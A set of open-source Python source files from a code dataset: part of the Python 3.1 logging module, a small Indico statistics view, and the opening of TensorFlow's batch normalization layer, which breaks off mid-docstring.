self.formatter = None
#get the module data lock, as we're updating a shared structure.
_acquireLock()
try: #unlikely to raise an exception, but you never know...
_handlers[self] = 1
_handlerList.insert(0, self)
finally:
_releaseLock()
self.createLock()
def createLock(self):
"""
Acquire a thread lock for serializing access to the underlying I/O.
"""
if thread:
self.lock = threading.RLock()
else:
self.lock = None
def acquire(self):
"""
Acquire the I/O thread lock.
"""
if self.lock:
self.lock.acquire()
def release(self):
"""
Release the I/O thread lock.
"""
if self.lock:
self.lock.release()
def setLevel(self, level):
"""
Set the logging level of this handler.
"""
self.level = level
def format(self, record):
"""
Format the specified record.
If a formatter is set, use it. Otherwise, use the default formatter
for the module.
"""
if self.formatter:
fmt = self.formatter
else:
fmt = _defaultFormatter
return fmt.format(record)
def emit(self, record):
"""
Do whatever it takes to actually log the specified logging record.
This version is intended to be implemented by subclasses and so
raises a NotImplementedError.
"""
raise NotImplementedError('emit must be implemented '
'by Handler subclasses')
def handle(self, record):
"""
Conditionally emit the specified logging record.
Emission depends on filters which may have been added to the handler.
Wrap the actual emission of the record with acquisition/release of
the I/O thread lock. Returns whether the filter passed the record for
emission.
"""
rv = self.filter(record)
if rv:
self.acquire()
try:
self.emit(record)
finally:
self.release()
return rv
def setFormatter(self, fmt):
"""
Set the formatter for this handler.
"""
self.formatter = fmt
def flush(self):
"""
Ensure all logging output has been flushed.
This version does nothing and is intended to be implemented by
subclasses.
"""
pass
def close(self):
"""
Tidy up any resources used by the handler.
This version does removes the handler from an internal list
of handlers which is closed when shutdown() is called. Subclasses
should ensure that this gets called from overridden close()
methods.
"""
#get the module data lock, as we're updating a shared structure.
_acquireLock()
try: #unlikely to raise an exception, but you never know...
del _handlers[self]
_handlerList.remove(self)
finally:
_releaseLock()
def handleError(self, record):
"""
Handle errors which occur during an emit() call.
This method should be called from handlers when an exception is
encountered during an emit() call. If raiseExceptions is false,
exceptions get silently ignored. This is what is mostly wanted
for a logging system - most users will not care about errors in
the logging system, they are more interested in application errors.
You could, however, replace this with a custom handler if you wish.
The record which was being processed is passed in to this method.
"""
if raiseExceptions:
ei = sys.exc_info()
try:
traceback.print_exception(ei[0], ei[1], ei[2], None, sys.stderr)
except IOError:
pass # see issue 5971
finally:
del ei
class StreamHandler(Handler):
"""
A handler class which writes logging records, appropriately formatted,
to a stream. Note that this class does not close the stream, as
sys.stdout or sys.stderr may be used.
"""
def __init__(self, strm=None):
"""
Initialize the handler.
If strm is not specified, sys.stderr is used.
"""
Handler.__init__(self)
if strm is None:
strm = sys.stderr
self.stream = strm
def flush(self):
"""
Flushes the stream.
"""
if self.stream and hasattr(self.stream, "flush"):
self.stream.flush()
def emit(self, record):
"""
Emit a record.
If a formatter is specified, it is used to format the record.
The record is then written to the stream with a trailing newline. If
exception information is present, it is formatted using
traceback.print_exception and appended to the stream. If the stream
has an 'encoding' attribute, it is used to determine how to do the
output to the stream.
"""
try:
msg = self.format(record)
stream = self.stream
fs = "%s\n"
if not _unicode: #if no unicode support...
stream.write(fs % msg)
else:
try:
if (isinstance(msg, unicode) and
getattr(stream, 'encoding', None)):
fs = fs.decode(stream.encoding)
try:
stream.write(fs % msg)
except UnicodeEncodeError:
#Printing to terminals sometimes fails. For example,
#with an encoding of 'cp1251', the above write will
#work if written to a stream opened or wrapped by
#the codecs module, but fail when writing to a
#terminal even when the codepage is set to cp1251.
#An extra encoding step seems to be needed.
stream.write((fs % msg).encode(stream.encoding))
else:
stream.write(fs % msg)
except UnicodeError:
stream.write(fs % msg.encode("UTF-8"))
self.flush()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class FileHandler(StreamHandler):
"""
A handler class which writes formatted logging records to disk files.
"""
def __init__(self, filename, mode='a', encoding=None, delay=0):
"""
Open the specified file and use it as the stream for logging.
"""
#keep the absolute path, otherwise derived classes which use this
#may come a cropper when the current directory changes
if codecs is None:
encoding = None
self.baseFilename = os.path.abspath(filename)
self.mode = mode
self.encoding = encoding
if delay:
#We don't open the stream, but we still need to call the
#Handler constructor to set level, formatter, lock etc.
Handler.__init__(self)
self.stream = None
else:
StreamHandler.__init__(self, self._open())
def close(self):
"""
Closes the stream.
"""
if self.stream:
self.flush()
if hasattr(self.stream, "close"):
self.stream.close()
StreamHandler.close(self)
self.stream = None
def _open(self):
"""
Open the current base file with the (original) mode and encoding.
Return the resulting stream.
"""
if self.encoding is None:
stream = open(self.baseFilename, self.mode)
else:
stream = codecs.open(self.baseFilename, self.mode, self.encoding)
return stream
def emit(self, record):
"""
Emit a record.
If the stream was not opened because 'delay' was specified in the
constructor, open it before calling the superclass's emit.
"""
if self.stream is None:
self.stream = self._open()
StreamHandler.emit(self, record)
#---------------------------------------------------------------------------
# Manager classes and functions
#---------------------------------------------------------------------------
class PlaceHolder:
"""
PlaceHolder instances are used in the Manager logger hierarchy to take
the place of nodes for which no loggers have been defined. This class is
intended for internal use only and not as part of the public API.
"""
def __init__(self, alogger):
"""
Initialize with the specified logger being a child of this placeholder.
"""
#self.loggers = [alogger]
self.loggerMap = { alogger : None }
def append(self, alogger):
"""
Add the specified logger as a child of this placeholder.
"""
#if alogger not in self.loggers:
if alogger not in self.loggerMap:
#self.loggers.append(alogger)
self.loggerMap[alogger] = None
#
# Determine which class to use when instantiating loggers.
#
_loggerClass = None
def setLoggerClass(klass):
"""
Set the class to be used when instantiating a logger. The class should
define __init__() such that only a name argument is required, and the
__init__() should call Logger.__init__()
"""
if klass != Logger:
if not issubclass(klass, Logger):
raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
global _loggerClass
_loggerClass = klass
def getLoggerClass():
"""
Return the class to be used when instantiating a logger.
"""
return _loggerClass
class Manager:
"""
There is [under normal circumstances] just one Manager instance, which
holds the hierarchy of loggers.
"""
def __init__(self, rootnode):
"""
Initialize the manager with the root node of the logger hierarchy.
"""
self.root = rootnode
self.disable = 0
self.emittedNoHandlerWarning = 0
self.loggerDict = {}
def getLogger(self, name):
"""
Get a logger with the specified name (channel name), creating it
if it doesn't yet exist. This name is a dot-separated hierarchical
name, such as "a", "a.b", "a.b.c" or similar.
If a PlaceHolder existed for the specified name [i.e. the logger
didn't exist but a child of it did], replace it with the created
logger and fix up the parent/child references which pointed to the
placeholder to now point to the logger.
"""
rv = None
_acquireLock()
try:
if name in self.loggerDict:
rv = self.loggerDict[name]
if isinstance(rv, PlaceHolder):
ph = rv
rv = _loggerClass(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupChildren(ph, rv)
self._fixupParents(rv)
else:
rv = _loggerClass(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupParents(rv)
finally:
_releaseLock()
return rv
def _fixupParents(self, alogger):
"""
Ensure that there are either loggers or placeholders all the way
from the specified logger to the root of the logger hierarchy.
"""
name = alogger.name
i = name.rfind(".")
rv = None
while (i > 0) and not rv:
substr = name[:i]
if substr not in self.loggerDict:
self.loggerDict[substr] = PlaceHolder(alogger)
else:
obj = self.loggerDict[substr]
if isinstance(obj, Logger):
rv = obj
else:
assert isinstance(obj, PlaceHolder)
obj.append(alogger)
i = name.rfind(".", 0, i - 1)
if not rv:
rv = self.root
alogger.parent = rv
def _fixupChildren(self, ph, alogger):
"""
Ensure that children of the placeholder ph are connected to the
specified logger.
"""
name = alogger.name
namelen = len(name)
for c in ph.loggerMap.keys():
#The if means ... if not c.parent.name.startswith(nm)
if c.parent.name[:namelen] != name:
alogger.parent = c.parent
c.parent = alogger
#---------------------------------------------------------------------------
# Logger classes and functions
#---------------------------------------------------------------------------
class Logger(Filterer):
"""
Instances of the Logger class represent a single logging channel. A
"logging channel" indicates an area of an application. Exactly how an
"area" is defined is up to the application developer. Since an
application can have any number of areas, logging channels are identified
by a unique string. Application areas can be nested (e.g. an area
of "input processing" might include sub-areas "read CSV files", "read
XLS files" and "read Gnumeric files"). To cater for this natural nesting,
channel names are organized into a namespace hierarchy where levels are
separated by periods, much like the Java or Python package namespace. So
in the instance given above, channel names might be "input" for the upper
level, and "input.csv", "input.xls" and "input.gnu" for the sub-levels.
There is no arbitrary limit to the depth of nesting.
"""
def __init__(self, name, level=NOTSET):
"""
Initialize the logger with a name and an optional level.
"""
Filterer.__init__(self)
self.name = name
self.level = level
self.parent = None
self.propagate = 1
self.handlers = []
self.disabled = 0
def setLevel(self, level):
"""
Set the logging level of this logger.
"""
self.level = level
def debug(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'DEBUG'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.debug("Houston, we have a %s", "thorny problem", exc_info=1)
"""
if self.isEnabledFor(DEBUG):
self._log(DEBUG, msg, args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'INFO'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.info("Houston, we have a %s", "interesting problem", exc_info=1)
"""
if self.isEnabledFor(INFO):
self._log(INFO, msg, args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'WARNING'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.warning("Houston, we have a %s", "bit of a problem", exc_info=1)
"""
if self.isEnabledFor(WARNING):
self._log(WARNING, msg, args, **kwargs)
warn = warning
def error(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'ERROR'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.error("Houston, we have a %s", "major problem", exc_info=1)
"""
if self.isEnabledFor(ERROR):
self._log(ERROR, msg, args, **kwargs)
def exception(self, msg, *args):
"""
Convenience method for logging an ERROR with exception information.
"""
self.error(msg, exc_info=1, *args)
def critical(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'CRITICAL'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.critical("Houston, we have a %s", "major disaster", exc_info=1)
"""
if self.isEnabledFor(CRITICAL):
self._log(CRITICAL, msg, args, **kwargs)
fatal = critical
def log(self, level, msg, *args, **kwargs):
"""
Log 'msg % args' with the integer severity 'level'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.log(level, "We have a %s", "mysterious problem", exc_info=1)
"""
if not isinstance(level, int):
if raiseExceptions:
raise TypeError("level must be an integer")
else:
return
if self.isEnabledFor(level):
self._log(level, msg, args, **kwargs)
def findCaller(self):
"""
Find the stack frame of the caller so that we can note the source
file name, line number and function name.
"""
f = currentframe().f_back
rv = "(unknown file)", 0, "(unknown function)"
while hasattr(f, "f_code"):
co = f.f_code
filename = os.path.normcase(co.co_filename)
if filename == _srcfile:
f = f.f_back
continue
rv = (filename, f.f_lineno, co.co_name)
break
return rv
def makeRecord(self, name, level, fn, lno, msg, args, exc_info, func=None, extra=None):
"""
A factory method which can be overridden in subclasses to create
specialized LogRecords.
"""
rv = LogRecord(name, level, fn, lno, msg, args, exc_info, func)
if extra is not None:
for key in extra:
if (key in ["message", "asctime"]) or (key in rv.__dict__):
raise KeyError("Attempt to overwrite %r in LogRecord" % key)
rv.__dict__[key] = extra[key]
return rv
def _log(self, level, msg, args, exc_info=None, extra=None):
"""
Low-level logging routine which creates a LogRecord and then calls
all the handlers of this logger to handle the record.
"""
if _srcfile:
#IronPython doesn't track Python frames, so findCaller throws an
#exception. We trap it here so that IronPython can use logging.
try:
fn, lno, func = self.findCaller()
except ValueError:
fn, lno, func = "(unknown file)", 0, "(unknown function)"
else:
fn, lno, func = "(unknown file)", 0, "(unknown function)"
if exc_info:
if not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
record = self.makeRecord(self.name, level, fn, lno, msg, args, exc_info, func, extra)
self.handle(record)
def handle(self, record):
"""
Call the handlers for the specified record.
This method is used for unpickled records received from a socket, as
well as those created locally. Logger-level filtering is applied.
"""
if (not self.disabled) and self.filter(record):
self.callHandlers(record)
def addHandler(self, hdlr):
"""
Add the specified handler to this logger.
"""
if not (hdlr in self.handlers):
self.handlers.append(hdlr)
def removeHandler(self, hdlr):
"""
Remove the specified handler from this logger.
"""
if hdlr in self.handlers:
#hdlr.close()
hdlr.acquire()
try:
self.handlers.remove(hdlr)
finally:
hdlr.release()
def callHandlers(self, record):
"""
Pass a record to all relevant handlers.
Loop through all handlers for this logger and its parents in the
logger hierarchy. If no handler was found, output a one-off error
message to sys.stderr. Stop searching up the hierarchy whenever a
logger with the "propagate" attribute set to zero is found - that
will be the last logger whose handlers are called.
"""
c = self
found = 0
while c:
for hdlr in c.handlers:
found = found + 1
if record.levelno >= hdlr.level:
hdlr.handle(record)
if not c.propagate:
c = None #break out
else:
c = c.parent
if (found == 0) and raiseExceptions and not self.manager.emittedNoHandlerWarning:
sys.stderr.write("No handlers could be found for logger"
" \"%s\"\n" % self.name)
self.manager.emittedNoHandlerWarning = 1
def getEffectiveLevel(self):
"""
Get the effective level for this logger.
Loop through this logger and its parents in the logger hierarchy,
looking for a non-zero logging level. Return the first one found.
"""
logger = self
while logger:
if logger.level:
return logger.level
logger = logger.parent
return NOTSET
def isEnabledFor(self, level):
"""
Is this logger enabled for level 'level'?
"""
if self.manager.disable >= level:
return 0
return level >= self.getEffectiveLevel()
class RootLogger(Logger):
"""
A root logger is not that different to any other logger, except that
it must have a logging level and there is only one instance of it in
the hierarchy.
"""
def __init__(self, level):
"""
Initialize the logger with the name "root".
"""
Logger.__init__(self, "root", level)
_loggerClass = Logger
class LoggerAdapter:
"""
An adapter for loggers which makes it easier to specify contextual
information in logging output.
"""
def __init__(self, logger, extra):
"""
Initialize the adapter with a logger and a dict-like object which
provides contextual information. This constructor signature allows
easy stacking of LoggerAdapters, if so desired.
You can effectively pass keyword arguments as shown in the
following example:
adapter = LoggerAdapter(someLogger, dict(p1=v1, p2="v2"))
"""
self.logger = logger
self.extra = extra
def process(self, msg, kwargs):
"""
Process the logging message and keyword arguments passed in to
a logging call to insert contextual information. You can either
manipulate the message itself, the keyword args or both. Return
the message and kwargs modified (or not) to suit your needs.
Normally, you'll only need to override this one method in a
LoggerAdapter subclass for your specific needs.
"""
kwargs["extra"] = self.extra
return msg, kwargs
def debug(self, msg, *args, **kwargs):
"""
Delegate a debug call to the underlying logger, after adding
contextual information from this adapter instance.
"""
msg, kwargs = self.process(msg, kwargs)
self.logger.debug(msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
Delegate an info call to the underlying logger, after adding
contextual information from this adapter instance.
"""
msg, kwargs = self.process(msg, kwargs)
self.logger.info(msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
Delegate a warning call to the underlying logger, after adding
contextual information from this adapter instance.
"""
msg, kwargs = self.process(msg, kwargs)
self.logger.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
Delegate an error call to the underlying logger, after adding
contextual information from this adapter instance.
"""
msg, kwargs = self.process(msg, kwargs)
self.logger.error(msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
"""
Delegate an exception call to the underlying logger, after adding
contextual information from this adapter instance.
"""
msg, kwargs = self.process(msg, kwargs)
kwargs["exc_info"] = 1
self.logger.error(msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
Delegate a critical call to the underlying logger, after adding
contextual information from this adapter instance.
"""
msg, kwargs = self.process(msg, kwargs)
self.logger.critical(msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
"""
Delegate a log call to the underlying logger, after adding
contextual information from this adapter instance.
"""
msg, kwargs = self.process(msg, kwargs)
self.logger.log(level, msg, *args, **kwargs)
root = RootLogger(WARNING)
Logger.root = root
Logger.manager = Manager(Logger.root)
#---------------------------------------------------------------------------
# Configuration classes and functions
#---------------------------------------------------------------------------
BASIC_FORMAT = "%(levelname)s:%(name)s:%(message)s"
def basicConfig(**kwargs):
"""
Do basic configuration for the logging system.
This function does nothing if the root logger already has handlers
configured. It is a convenience method intended for use by simple scripts
to do one-shot configuration of the logging package.
The default behaviour is to create a StreamHandler which writes to
sys.stderr, set a formatter using the BASIC_FORMAT format string, and
add the handler to the root logger.
A number of optional keyword arguments may be specified, which can alter
the default behaviour.
filename Specifies that a FileHandler be created, using the specified
filename, rather than a StreamHandler.
filemode Specifies the mode to open the file, if filename is specified
(if filemode is unspecified, it defaults to 'a').
format Use the specified format string for the handler.
datefmt Use the specified date/time format.
level Set the root logger level to the specified level.
stream Use the specified stream to initialize the StreamHandler. Note
that this argument is incompatible with 'filename' - if both
are present, 'stream' is ignored.
Note that you could specify a stream created using open(filename, mode)
rather than passing the filename and mode in. However, it should be
remembered that StreamHandler does not close its stream (since it may be
using sys.stdout or sys.stderr), whereas FileHandler closes its stream
when the handler is closed.
"""
if len(root.handlers) == 0:
filename = kwargs.get("filename")
if filename:
mode = kwargs.get("filemode", 'a')
hdlr = FileHandler(filename, mode)
else:
stream = kwargs.get("stream")
hdlr = StreamHandler(stream)
fs = kwargs.get("format", BASIC_FORMAT)
dfs = kwargs.get("datefmt", None)
fmt = Formatter(fs, dfs)
hdlr.setFormatter(fmt)
root.addHandler(hdlr)
level = kwargs.get("level")
if level is not None:
if str(level) == level: # If a string was passed, do more checks
if level not in _levelNames:
raise ValueError("Unknown level: %r" % level)
level = _levelNames[level]
root.setLevel(level)
#---------------------------------------------------------------------------
# Utility functions at module level.
# Basically delegate everything to the root logger.
#---------------------------------------------------------------------------
def getLogger(name=None):
"""
Return a logger with the specified name, creating it if necessary.
If no name is specified, return the root logger.
"""
if name:
return Logger.manager.getLogger(name)
else:
return root
#def getRootLogger():
# """
# Return the root logger.
#
# Note that getLogger('') now does the same thing, so this function is
# deprecated and may disappear in the future.
# """
# return root
def critical(msg, *args, **kwargs):
"""
Log a message with severity 'CRITICAL' on the root logger.
"""
if len(root.handlers) == 0:
basicConfig()
root.critical(msg, *args, **kwargs)
fatal = critical
def error(msg, *args, **kwargs):
"""
Log a message with severity 'ERROR' on the root logger.
"""
if len(root.handlers) == 0:
basicConfig()
root.error(msg, *args, **kwargs)
def exception(msg, *args):
"""
Log a message with severity 'ERROR' on the root logger,
with exception information.
"""
error(msg, exc_info=1, *args)
def warning(msg, *args, **kwargs):
"""
Log a message with severity 'WARNING' on the root logger.
"""
if len(root.handlers) == 0:
basicConfig()
root.warning(msg, *args, **kwargs)
warn = warning
def info(msg, *args, **kwargs):
"""
Log a message with severity 'INFO' on the root logger.
"""
if len(root.handlers) == 0:
basicConfig()
root.info(msg, *args, **kwargs)
def debug(msg, *args, **kwargs):
"""
Log a message with severity 'DEBUG' on the root logger.
"""
if len(root.handlers) == 0:
basicConfig()
root.debug(msg, *args, **kwargs)
def log(level, msg, *args, **kwargs):
"""
Log 'msg % args' with the integer severity 'level' on the root logger.
"""
if len(root.handlers) == 0:
basicConfig()
root.log(level, msg, *args, **kwargs)
def disable(level):
"""
Disable all logging calls less severe than 'level'.
"""
root.manager.disable = level
def shutdown(handlerList=_handlerList):
"""
Perform any cleanup actions in the logging system (e.g. flushing
buffers).
Should be called at application exit.
"""
for h in handlerList[:]:
#errors might occur, for example, if files are locked
#we just ignore them if raiseExceptions is not set
try:
h.flush()
h.close()
except:
if raiseExceptions:
raise
#else, swallow
#Let's try and shutdown automatically on application exit...
try:
import atexit
atexit.register(shutdown)
except ImportError: # for Python versions < 2.0
def exithook(status, old_exit=sys.exit):
try:
shutdown()
finally:
old_exit(status)
sys.exit = exithook
# Null handler
class NullHandler(Handler):
"""
This handler does nothing. It's intended to be used to avoid the
"No handlers could be found for logger XXX" one-off warning. This is
important for library code, which may contain code to log events. If a user
of the library does not configure logging, the one-off warning might be
produced; to avoid this, the library developer simply needs to instantiate
a NullHandler and add it to the top-level logger of the library module or
package.
"""
def emit(self, record):
pass
# Warnings integration
_warnings_showwarning = None
def _showwarning(message, category, filename, lineno, file=None, line=None):
"""
Implementation of showwarnings which redirects to logging, which will first
check to see if the file parameter is None. If a file is specified, it will
delegate to the original warnings implementation of showwarning. Otherwise,
it will call warnings.formatwarning and will log the resulting string to a
warnings logger named "py.warnings" with level logging.WARNING.
"""
if file is not None:
if _warnings_showwarning is not None:
_warnings_showwarning(message, category, filename, lineno, file, line)
else:
s = warnings.formatwarning(message, category, filename, lineno, line)
logger = getLogger("py.warnings")
if not logger.handlers:
logger.addHandler(NullHandler())
logger.warning("%s", s)
def captureWarnings(capture):
"""
If capture is true, redirect all warnings to the logging package.
If capture is False, ensure that warnings are not redirected to logging
but to their original destinations.
"""
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = _showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
| MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.1/Lib/logging/__init__.py | Python | mit | 55,162 |
# This file is part of Indico.
# Copyright (C) 2002 - 2015 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from MaKaC.webinterface.pages.base import WPJinjaMixin
from MaKaC.webinterface.pages.category import WPCategoryDisplayBase
from MaKaC.webinterface.wcomponents import WSimpleNavigationDrawer
class WPCategoryStatistics(WPJinjaMixin, WPCategoryDisplayBase):
template_prefix = 'categories/'
def _getBody(self, params):
return self._getPageContent(params)
def _getNavigationDrawer(self):
return WSimpleNavigationDrawer(self._target.getName(), type='Statistics')
def getJSFiles(self):
return (WPCategoryDisplayBase.getJSFiles(self) + self._includeJSPackage('jqplot_js', prefix='')
+ self._asset_env['statistics_js'].urls() + self._asset_env['modules_category_statistics_js'].urls())
def getCSSFiles(self):
return WPCategoryDisplayBase.getCSSFiles(self) + self._asset_env['jqplot_css'].urls()
| XeCycle/indico | indico/modules/categories/views.py | Python | gpl-3.0 | 1,629 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
# pylint: disable=unused-import,g-bad-import-order
"""Contains the normalization layer classes and their functional aliases.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import standard_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.training import moving_averages
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import variables
from tensorflow.python.layers import base
from tensorflow.python.layers import utils
class BatchNormalization(base._Layer): # pylint: disable=protected-access
"""Batch Normalization layer from http://arxiv.org/abs/1502.03167.
"Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift"
Sergey Ioffe, Christian Szegedy
Arguments:
axis: Integer, the axis that should be normalized (typically the features
axis). For instance, after a `Convolution2D` layer with
`data_format="channels_first"`, set `axis=1` in `BatchNormalization`.
momentum: Momentum for the moving average.
epsilon: Small float added to variance to avoid dividing by zero.
center: If True, add offset of `beta` to normalized tensor. If False, `beta`
is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
moving_mean_initializer: Initializer for the moving mean.
moving_variance_initializer: Initializer for the moving variance.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
name: A string, the name of the layer.
"""
def __init__(self,
axis=-1,
momentum=0.99,
epsilon=1e-3,
center=True,
scale=True,
beta_initializer=init_ops.zeros_initializer(),
gamma_initializer=init_ops.ones_initializer(),
moving_mean_initializer=init_ops.zeros_initializer(),
moving_variance_initializer=init_ops.ones_initializer(),
beta_regularizer=None,
gamma_regularizer=None,
trainable=True,
name=None,
**kwargs):
super(BatchNormalization, self).__init__(
name=name, trainable=trainable, **kwargs)
self.axis = axis
self.momentum = momentum
self.epsilon = epsilon
self.center = center
self.scale = scale
self.beta_initializer = beta_initializer
self.gamma_initializer = gamma_initializer
self.moving_mean_initializer = moving_mean_initializer
self.moving_variance_initializer = moving_variance_initializer
self.beta_regularizer = beta_regularizer
self.gamma_regularizer = gamma_regularizer
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
if not input_shape.ndims:
raise ValueError('Input has undefined rank:', input_shape)
ndim = len(input_shape)
if self.axis < 0:
axis = ndim + self.axis
else:
axis = self.axis
if axis < 0 or axis >= ndim:
raise ValueError('Value of `axis` argument ' + str(self.axis) +
' is out of range for input with rank ' + str(ndim))
param_dim = input_shape[axis]
if not param_dim.value:
raise ValueError('Input has undefined `axis` dimension. Input shape: ',
input_shape)
if self.center:
self.beta = vs.get_variable('beta',
shape=(param_dim,),
initializer=self.beta_initializer,
regularizer=self.beta_regularizer,
trainable=True)
else:
self.beta = None
if self.scale:
self.gamma = vs.get_variable('gamma',
shape=(param_dim,),
initializer=self.gamma_initializer,
regularizer=self.gamma_regularizer,
trainable=True)
else:
self.gamma = None
# Disable variable partitioning when creating the moving mean and variance
partitioner = vs.get_variable_scope().partitioner
try:
vs.get_variable_scope().set_partitioner(None)
self.moving_mean = vs.get_variable(
'moving_mean',
shape=(param_dim,),
initializer=self.moving_mean_initializer,
trainable=False)
self.moving_variance = vs.get_variable(
'moving_variance',
shape=(param_dim,),
initializer=self.moving_variance_initializer,
trainable=False)
finally:
vs.get_variable_scope().set_partitioner(partitioner)
def call(self, inputs, training=False):
# First, compute the axes along which to reduce the mean / variance,
# as well as the broadcast shape to be used for all parameters.
input_shape = inputs.get_shape()
ndim = len(input_shape)
reduction_axes = list(range(len(input_shape)))
del reduction_axes[self.axis]
broadcast_shape = [1] * len(input_shape)
broadcast_shape[self.axis] = input_shape[self.axis].value
# Determines whether broadcasting is needed.
needs_broadcasting = (sorted(reduction_axes) != range(ndim)[:-1])
# Determine a boolean value for `training`: could be True, False, or None.
training_value = utils.constant_value(training)
if needs_broadcasting:
# In this case we must explictly broadcast all parameters.
if self.center:
broadcast_beta = array_ops.reshape(self.beta, broadcast_shape)
else:
broadcast_beta = None
if self.scale:
broadcast_gamma = array_ops.reshape(self.gamma, broadcast_shape)
else:
broadcast_gamma = None
if training_value is not False:
if needs_broadcasting:
broadcast_mean, broadcast_variance = nn.moments(
inputs, reduction_axes, keep_dims=True)
mean = array_ops.reshape(broadcast_mean, [-1])
variance = array_ops.reshape(broadcast_variance, [-1])
else:
mean, variance = nn.moments(inputs, reduction_axes)
# Prepare updates if necessary.
if not self.updates:
mean_update = moving_averages.assign_moving_average(
self.moving_mean, mean, self.momentum, zero_debias=False)
variance_update = moving_averages.assign_moving_average(
self.moving_variance, variance, self.momentum, zero_debias=False)
# In the future this should be refactored into a self.add_update
# methods in order to allow for instance-based BN layer sharing
# across unrelated input streams (e.g. like in Keras).
self.updates.append(mean_update)
self.updates.append(variance_update)
# Normalize batch. We do this inside separate functions for training
# and inference so as to avoid evaluating both branches.
def normalize_in_test():
if needs_broadcasting:
broadcast_moving_mean = array_ops.reshape(self.moving_mean,
broadcast_shape)
broadcast_moving_variance = array_ops.reshape(self.moving_variance,
broadcast_shape)
return nn.batch_normalization(inputs,
broadcast_moving_mean,
broadcast_moving_variance,
broadcast_beta,
broadcast_gamma,
self.epsilon)
else:
return nn.batch_normalization(inputs,
self.moving_mean,
self.moving_variance,
self.beta if self.center else None,
self.gamma if self.scale else None,
self.epsilon)
def normalize_in_training():
if needs_broadcasting:
return nn.batch_normalization(inputs,
broadcast_mean,
broadcast_variance,
broadcast_beta,
broadcast_gamma,
self.epsilon)
else:
return nn.batch_normalization(inputs,
mean,
variance,
self.beta if self.center else None,
self.gamma if self.scale else None,
self.epsilon)
return utils.smart_cond(training,
normalize_in_training,
normalize_in_test)
def batch_normalization(inputs,
axis=-1,
momentum=0.99,
epsilon=1e-3,
center=True,
scale=True,
beta_initializer=init_ops.zeros_initializer(),
gamma_initializer=init_ops.ones_initializer(),
moving_mean_initializer=init_ops.zeros_initializer(),
moving_variance_initializer=init_ops.ones_initializer(),
beta_regularizer=None,
gamma_regularizer=None,
training=False,
trainable=True,
name=None,
reuse=None):
"""Functional interface for the batch normalization layer.
Reference: http://arxiv.org/abs/1502.03167
"Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift"
Sergey Ioffe, Christian Szegedy
Arguments:
inputs: Tensor input.
axis: Integer, the axis that should be normalized (typically the features
axis). For instance, after a `Convolution2D` layer with
`data_format="channels_first"`, set `axis=1` in `BatchNormalization`.
momentum: Momentum for the moving average.
epsilon: Small float added to variance to avoid dividing by zero.
center: If True, add offset of `beta` to normalized tensor. If False, `beta`
is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
moving_mean_initializer: Initializer for the moving mean.
